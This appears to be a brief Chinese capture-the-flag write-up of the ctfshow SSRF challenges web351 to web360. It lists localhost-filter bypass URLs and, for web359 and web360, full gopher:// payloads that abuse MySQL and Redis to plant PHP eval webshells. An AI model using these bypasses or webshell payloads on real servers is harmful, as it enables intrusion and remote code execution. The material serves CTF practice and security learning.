web351
url=127.0.0.1/flag.phpweb352
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/'))不给用127.0.0.1,用他的10进制2130706433
url=http://2130706433/flag.phpweb353
还是能用10进制过
web354
喵喵喵不会啊
web355
输入 127.1 时,实际上是将其解析为 127.0.0.1。那么刚刚好5 位
url=http://127.1/flag.phpweb356
url=http://0/flag.php
web357
喵喵喵还是不会啊
web358
CTF开头show结尾
@ 符号后面的部分被认为是用户名,而不是域名的一部分。因此,解析器会将 ctf. 解析为用户名,将 @127.0.0.1 解析为 IP 地址。
url=http://ctf.@127.0.0.1/flag.php#show
web359
hint:打无密码MySQL,用Gopherus。
python gopherus.py --exploit mysql
root
select "<?php @eval($_POST[yyy]);?>" into outfile "/var/www/html/mmm.php";
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4b%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%79%79%79%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%6d%6d%6d%2e%70%68%70%22%3b%01%00%00%00%01用蚁剑在根目录找到flag
web360
hint:打redis继续用Gopherus
gopherus --exploit redis
php
<?php eval($_POST['yyy']);?>
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B%27yyy%27%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
